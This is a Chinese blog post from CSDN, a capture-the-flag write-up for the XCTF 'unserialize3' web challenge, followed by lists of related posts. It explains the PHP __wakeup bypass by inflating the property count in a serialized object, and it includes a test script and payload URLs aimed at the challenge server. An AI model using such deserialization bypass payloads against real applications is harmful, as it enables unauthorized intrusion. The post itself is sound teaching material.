xctf的unserialize3反序列化

最新推荐文章于 2024-05-16 16:49:26 发布
最新推荐文章于 2024-05-16 16:49:26 发布
阅读量309 收藏 1
点赞数
分类专栏: CTF—web安全 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hhyukJae/article/details/129581928
版权

在这里插入图片描述

php反序列化

魔术方法 _wakeup()
unserialize() 将已序列化的字符串还原回 PHP 的值,unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源
漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行

测试序列化

可以搞一个测试脚本

<?php
class xctf{                      //定义一个名为xctf的类
public $flag = '111';            //定义一个公有的类属性$flag,值为111
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
}
$peak = new xctf();           //使用new运算符来实例化该类(xctf)的对象为peak
echo(serialize($peak));       //输出被序列化的对象(peak)
?>

得到序列化后的是

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

其中,序列化字符串各部分简单释义:
O代表结构类型为类:4表示类名长度:"xctf"是类名:属性(成员)个数1:{属性名类型s:长度4:名称flag;值类型s:长度3:值111}

构造payload

http://61.147.171.105:53594/?code=O:4:%22xctf%22:1:{s:4:%22flag%22;s:3:%22111%22;}
在这里插入图片描述
显示bad request,需要绕过_wake up()函数

将属性个数改为大于1的数字,绕过_wake up()

输入http://61.147.171.105:53594/?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}
在这里插入图片描述

Graciela?
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
unserialize3 反序列化
Rashu99's blog
09-01 276
参考blog 攻防世界 web进阶 unserialize3 题目 运行得到 重点关注被序列化的对象属性个数 当序列化字符串当中属性个数值大于实际的属性个数时,就会导致反序列化异常,从而跳过__wakeup函数 与序列化和反序列化的魔术方法主要是: __construct() //当一个对象创建时被调用 __destruct() //对象被销毁时触发 __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __toString() /
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
unserialize3中学习序列化和反序列化
weixin_52555162的博客
02-20 238
今天刷到这一题正好学习一下序列化和反序列化 一、什么是序列化和反序列化呢? 首先我们来想一下序列化到底好在哪里呢?为什么要用序列化?php序列化到底好在哪里? 首先我们可以知道这种方式肯定是为了传输数据的方便,你可以这样去理解,这样做就相当于你将一个实例化对象长久的储存在了计算机的磁盘上,无论什么时候调用你都可以把它恢复成原来的样子,这样做实际上是为了解决这个问题,因为当PHP文件在执行结束之后就会销毁这个对象,那么如果接下恰好你又需要调用这个对象,那肯定是不方便的,而且你也不能一直让这个对象存在..
CTF_Web反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 5533
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
攻防世界XCTFunserialize3
末初的CSDN博客
03-08 702
首先了解一下一些魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone() 和 __debugInfo() 等...
xctf php序列化,xctf一道反序列化
weixin_39606575的博客
03-28 271
右键get源码:1
unserialize3反序列化漏洞零基础详解
sGanYu
09-08 2727
反序列化漏洞(序列化←→反序列化) 什么是序列化(serialize) 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串 什么是反序列化(unserialize) 将字符串转换为状态信息
xctfunserialize3
小白渣的博客
10-21 4129
目标: 了解php反序列化中__wakeup漏洞的利用 了解php魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state...
xctf-unserialize3php反序列化学习记录)
qq_39670065的博客
09-26 400
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 发现有__wakeup函数,这个函数是php中的一个magic函数,常用在反序列化操作中,如重新建立数据库连接,或执行其它初始化操作 先来学习一下php序列化与反序列化 序列化: 函数 : serialize() 把复杂的数据类型压缩到一个字符串中,数据类型可以是数组,字符串,对象等。序列化一个对象将会保存对象的所有变.
unserialize3php序列化、反序列化及绕过)
Welcome To Myon'Blog !
03-27 739
PHP基础知识与理解,__wakeup()函数,new函数,PHP的序列化与反序列化,局部变量与全局变量,payload构造,脚本编写,绕过,get传参
XCTF-Mobile】新手练习区-08-app3.rar
08-30
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
为什么Redis6.0引入了多线程
IT深耕十余载,大道之简
05-11 520
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
thinkphp8 framework和 element plus admin前后端分离系统之PHP安装教程
luck332的专栏
05-12 378
DIYGW-UI-PHP是一款基于thinkphp8 framework和 element plus admin开发而成的前后端分离系统。目的是结合现有diygw-ui打造一个后台API开发。实现PHP源码前请先下载小皮面板或者宝塔。系统已经集成了部分功能。
关于 struct sockaddr_in
weixin_73964834的博客
05-16 487
这个struct sockaddr_in 前三行有三个变量。
picoCTF-Web Exploitation-Web Gauntlet
huckers的博客
05-12 461
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
php 执行 ffmpeg 可能遇到的问题
最新发布
qq_32166533的博客
05-16 64
需要注意的是,因为这里写的 \ 斜线,所以可能对字符进行了转义,导致执行失败,所以可以添加 \\ 为这种形式,如果可以执行了,说明是php 获取到的环境变量有误,需要特别注意的是,环境变量中的 \ 也会进行转义,影响正常执行,所以在 配置环境变量时,遇到会转移的字符,也需要 加 2个 \\ 斜线;安装成功后,还需要把 ffmpeg 添加到环境变量。ffmpeg -version 如果提示。先确定 ffmpeg 是否 成功安装。
unserialize3
07-27
回答: unserialize()函数是PHP中与序列化相关的函数之一,它可以将已序列化的变量(字符串)变回原来的PHP值。\[1\]在你提供的代码中,使用了serialize()函数将一个类的实例进行序列化,并将结果打印出来。然后,你想知道如何使用unserialize()函数来反序列化这个字符串。在这个例子中,你可以使用unserialize()函数来将$Myon字符串反序列化为原来的对象。例如,你可以使用以下代码来实现反序列化操作:$Myon = unserialize($Myon);。这样,$Myon变量将恢复为原来的xctf类的实例。 #### 引用[.reference_title] - *1* *2* *3* [unserialize3php序列化、反序列化及绕过)](https://blog.csdn.net/Myon5/article/details/129798095)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值